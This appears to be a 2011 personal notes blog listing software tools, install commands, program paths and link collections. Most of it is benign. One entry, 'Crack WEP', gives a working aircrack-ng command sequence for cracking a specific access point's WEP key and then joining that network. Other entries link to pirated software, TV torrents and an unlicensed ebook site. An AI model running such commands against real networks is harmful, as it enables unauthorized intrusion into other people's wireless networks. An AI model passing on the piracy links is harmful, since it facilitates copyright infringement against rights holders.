September 29, 2011

SoX

SoX is a cross-platform (Windows, Linux, MacOS X, etc.) command line utility that can convert various formats of computer audio files in to other formats. It can also apply various effects to these sound files, and, as an added bonus, SoX can play and record audio files on most platforms.

Website
sox.sourceforge.net

References:
blog.musicbrainz.org/?p=945
sox.git.sourceforge.net/git/gitweb.cgi?p=sox/sox;a=blob;f=README.win32

September 25, 2011

PolarSSL

PolarSSL is a dual licensed (open source - GPLv2 and commercial) implementation of the SSL and TLS protocols. The core library (written in the C programming language) implements the basic cryptographic functions and provides various utility functions.

Install required packages
mingw-get install msys-wget

Install PolarSSL
wget http://polarssl.org/code/releases/polarssl-1.0.0-gpl.tgz
tar xf polarssl-1.0.0-gpl.tgz
cd polarssl-1.0.0
make CC=gcc APPS=
make DESTDIR=/mingw install

References:
marc.info/?l=mingw-users&m=117769874710905
polarssl.org/forum_view_topic?topic_id=188
polarssl.org/trac/ticket/35

Perl

Perl is a high-level, general-purpose, interpreted, dynamic programming language. Perl was originally developed by Larry Wall in 1987 as a general-purpose Unix scripting language to make report processing easier. Since then, it has undergone many changes and revisions and become widely popular amongst programmers. Larry Wall continues to oversee development of the core language, and its upcoming version, Perl 6. Perl borrows features from other programming languages including C, shell scripting (sh), AWK, and sed. The language provides powerful text processing facilities without the arbitrary data length limits of many contemporary Unix tools, facilitating easy manipulation of text files. Perl gained widespread popularity in the late 1990s as a CGI scripting language, in part due to its parsing abilities.

perl -MCPAN -e shell
install XML::Simple

Links

comp.leeds.ac.uk/Perl/subroutines.html
cslibrary.stanford.edu/108/EssentialPerl.html
dummies.com/how-to/content/contrasting-single-and-double-quotes-in-perl.html
en.allexperts.com/q/Perl-CGI-1045/2008/9/perl-Regular-Expression-usage.htm
linuxquestions.org/questions/other-*nix-55/calling-awk-commands-in-perl-script-596029
math.utah.edu/docs/info/gawk_5.html
oreilly.com/catalog/prkunix/excerpt/PWPMch01.html#MARKER-9-47
perl.about.com/od/perltutorials/a/readwritefiles_2.htm
perl101.org/files.html
perldoc.perl.org/perlref.html
perlmonks.org/?node_id=368332
perlmonks.org/?node_id=383935
perlmonks.org/?node_id=626676
somacon.com/p127.php
stackoverflow.com/questions/4598162/html-parsing-in-perl
stackoverflow.com/questions/6891589/how-to-create-dump-file-using-perl
stackoverflow.com/questions/799968/whats-the-difference-between-perls-backticks-system-and-exec
stackoverflow.com/questions/845060/what-is-the-difference-between-my-and-our-in-perl
stackoverflow.com/questions/974656/automatically-get-loop-index-in-foreach-loop-in-perl
thegeekstuff.com/2010/01/8-powerful-awk-built-in-variables-fs-ofs-rs-ors-nr-nf-filename-fnr
unix.com/shell-programming-scripting/116856-how-execute-grep-perl.html
unix.com/shell-programming-scripting/28419-stop-awk-adding-new-line.html
unix.com/shell-programming-scripting/79444-perl-awk-replacement-script.html 
unix.com/shell-programming-scripting/92731-remove-special-characters-text-using-perl.html
wd.iworld.com/forum/showthread.php?t=143033
wikibooks.org/wiki/Perl_Programming/Array_Variables

September 24, 2011

Program Locations

7-Zip
C:\Program Files\7-Zip

AtomicParsley
C:\Dropbox\bin

Avidemux
C:\Program Files\Avidemux 2.5

cURL
C:\Dropbox\bin

DriveSort
C:\Dropbox\Downloads

DvdAuthor
C:\Dropbox\bin

FFmpeg
C:\Dropbox\bin

Git
C:\Dropbox\bin

HandBrake
C:\Dropbox\bin

Insomnia
C:\Dropbox\Downloads

MinGW
C:\MinGW

mkISOfs
C:\Dropbox\bin

Notepad2
C:\Program Files\Notepad2

Process Dumper
C:\Dropbox\bin

RtmpDump
C:\Dropbox\bin

RtmpExplorer
C:\Dropbox\Downloads\RtmpExplorer

RtmpSrv
C:\Dropbox\bin

SciTE
C:\Program Files (x86)\SciTE

Strawberry Perl
C:\strawberry

SumatraPDF
C:\Program Files (x86)\SumatraPDF

VLC media player
C:\Program Files (x86)\VideoLAN\VLC

September 16, 2011

Crack WEP

Hardware selection
aircrack-ng.org/doku.php?id=compatibility_drivers

madwifi-project.org/wiki/Compatibility

Install BackTrack Linux
backtrack-linux.org

Test hardware
List interfaces
airmon-ng

Enable monitor mode
airmon-ng start wlan0

Test injection
aireplay-ng --test mon0

Assoicate with the AP
Find target AP
airodump-ng mon0

Start capture
airodump-ng -c 11 --bssid 30:46:9A:A3:7C:06 -w GOBIN mon0

Fake authentication with AP
aireplay-ng --fakeauth 0 -a 30:46:9A:A3:7C:06 mon0

Interactive frame selection attack
aireplay-ng --interactive -p 0841 -c FF:FF:FF:FF:FF:FF -a 30:46:9A:A3:7C:06 mon0

WEP-encrypted ARP request packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes.

Standard ARP-request replay attack
Use this attack only if there is an active client.

aireplay-ng --arpreplay -b 30:46:9A:A3:7C:06 mon0

Crack
aircrack-ng GOBIN-01.cap

It is usually 10000-34000 IVs to find the key. The WEP key appears next to "KEY FOUND". Drop the colons and enter it to log onto the network.

Links

aircrack-ng.org/doku.php?id=i_am_injecting_but_the_ivs_don_t_increase
backtrack-linux.org/forums/backtrack-5-beginners-section/40837-injection-working-but-no-data-increase.html
backtrack-linux.org/forums/backtrack-5-beginners-section/41824-cant-get-arp-request-0-pps-packet-sent.html
lifehacker.com/5305094/how-to-crack-a-wi+fi-networks-wep-password-with-backtrack

September 14, 2011

Microsoft Streets & Trips 2011

Microsoft Streets & Trips, known in Europe as Microsoft AutoRoute, is mapping software developed and distributed by Microsoft. Functionally the latest version is a subset of Microsoft MapPoint targeted at the average consumer to do a variety of map related tasks in the North American region including the United States, Canada, and Mexico, such as route planning.

thepiratebay.org/torrent/6249471/Microsoft_Streets_And_Trips_(2011)_

WinCDEmu

WinCDEmu is an open-source CD/DVD/BD emulator - a tool that allows you to mount optical disc mages by simply clicking on them in Windows Explorer. If you have downloaded an ISO image and want to use it without burning it to a blank disc, WinCDEmu is the easiest way to do it.

Website
wincdemu.sysprogs.org

Download portable version

September 9, 2011

Web Design

Web design is the process of designing websites — a collection of online content including documents and applications that reside on a web server/servers.

As a whole, the process of web design includes planning, post-production, research, advertising, as well as media control that is applied to the pages within the site by the designer or group of designers with a specific purpose. The site itself can be divided into its main page, also known as the home page, which cites the main objective as well as highlights of the site's daily updates; which also contains hyperlinks that functions to direct viewers to a designated page within the site's domain.

References:
blog.penelopetrunk.com
css-tricks.com/2833-the-css-overflow-property
google.com/webfonts
learnyouahaskell.com/input-and-output
mikenassar.blogspot.com
rubyinside.com/a-minitestspec-tutorial-elegant-spec-style-testing-that-comes-with-ruby-5354.html
salon.com/news/opinion/glenn_greenwald/2011/01/07/twitter/index.html
twitter.github.com/bootstrap
yannesposito.com/Scratch/en/blog/03_losthighway

September 6, 2011

e-reading.org.ua

e-reading.org.ua is a noncommercial free library created for popularization of fiction and accordingly of increase of the general educational level and culture. The library contains over 100,000 books, the fund is constantly updated. Therefore it is quite possible that the book which author of it doesn't wish will get to open access.

Wherever possible, the releases are available in plain text, but other formats are included, such as HTML, PDF, EPUB, MOBI, and Plucker. Most releases are in the English language, but many non-English works are also available.

Links

e-reading.org.ua/copyright.php

September 4, 2011

Top Gear

Top Gear is a British television series about motor vehicles, primarily cars. It began in 1977 as a conventional motoring magazine show. Over time, and especially since a relaunch in 2002, it has developed a quirky, humorous style. The show is currently presented by Jeremy Clarkson, Richard Hammond and James May, and has featured at least three different test drivers known as The Stig.

The show has received acclaim for its visual style and presentation, as well as criticism for its content and comments made by presenters. Columnist A. A. Gill, close friend of Clarkson and fellow Sunday Times columnist, described the show as "a triumph of the craft of programme making, of the minute, obsessive, musical masonry of editing, the French polishing of colourwashing and grading".

Links
bitsnoop.com/top-gear-season-01-sbs-rips-q1587696.html

bitsnoop.com/top-gear-season-2-bbc-prime-q1611684.html

bitsnoop.com/top-gear-season-03-bbc-prime-q1616291.html

bitsnoop.com/top-gear-season-04-hdtv-xvid-scene-q1618354.html

bitsnoop.com/top-gear-season-05-hdtv-xvid-scene-q1622610.html

bitsnoop.com/top-gear-season-06-hdtv-xvid-scene-q1628718.html

bitsnoop.com/top-gear-season-07-hdtv-xvid-scene-q1628710.html
Includes Winter Olympics Special

bitsnoop.com/top-gear-season-08-scene-q1684061.html

bitsnoop.com/top-gear-season-09-scene-with-prope-q1684059.html
Includes US Special

bitsnoop.com/top-gear-season-10-scene-q3333410.html
Includes Polar Special, Botswana Special

bitsnoop.com/top-gear-season-11-scene-q2435257.html

bitsnoop.com/top-gear-season-12-scene-q2420659.html
Includes Vietnam Special

bitsnoop.com/top-gear-season-13-scene-q985959.html

bitsnoop.com/top-gear-season-14-q419458.html
Includes Bolivia Special

bitsnoop.com/top-gear-season-15-dfx-q14184846.html

http://bitsnoop.com/top-gear-season-16-q23404274.html
Includes USA Road Trip, Middle East Special

bitsnoop.com/top-gear-season-17-complete-720p-hd-q28012829.html

Links

finalgear.com/shows/topgear
forums.finalgear.com/top-gear-episode-songs
torrentz.eu
wikipedia.org/wiki/List_of_Top_Gear_episodes